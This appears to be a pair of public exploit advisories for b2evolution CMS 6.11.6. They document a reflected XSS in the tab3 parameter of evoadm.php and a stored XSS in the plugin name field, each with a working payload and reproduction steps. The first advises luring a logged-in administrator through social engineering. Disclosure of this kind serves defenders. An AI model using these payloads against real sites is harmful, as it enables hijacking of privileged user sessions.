# Exploit Title: *Reflected XSS in b2evolution CMS 6.11.6 via tab3
parameter in evoadm.php*
# CVE : *CVE-2020-22839*
# Date: 10/02/2021
# Exploit Author: Nakul Ratti, Soham Bakore
# Vendor Homepage: https://b2evolution.net/
# Software Link:
https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux


Vulnerable File:
--------------------------
http://host/evoadm.php

Vulnerable Issue:
--------------------------
Tab3 parameter has no input validation.

--------------------------Proof of Concept-----------------------
Steps to Reproduce:

1. Send the following URL *http://HOST/evoadm.php <http://host/evoadm.php>?*
*.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1*
to
the logged in victim using any social engineering technique.
2. When an unsuspecting user with high privileges opens this URL, XSS will
be triggered  which will execute the malicious javascript payload in users
browser.
3. The vulnerable parameter in this case is “*tab3*”.



------

# Exploit Title: b2evolution 6.11.6 - 'plugin name' Stored XSS
# Date: 09/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE : CVE-2020-22841


--------------------------Proof of Concept-----------------------

1. Login with an account having high privileges  
2. Navigate to System -> Plugins and select any plugin
3. Change the plugin name and enter the following payload  "><svg/onload=alert(123)> in the name parameter
4. Payload gets stored in the database
5. The payload gets executed after the victim checks the plugin page.
6. This vulnerability needs high privilege and can affect other users with similar privileges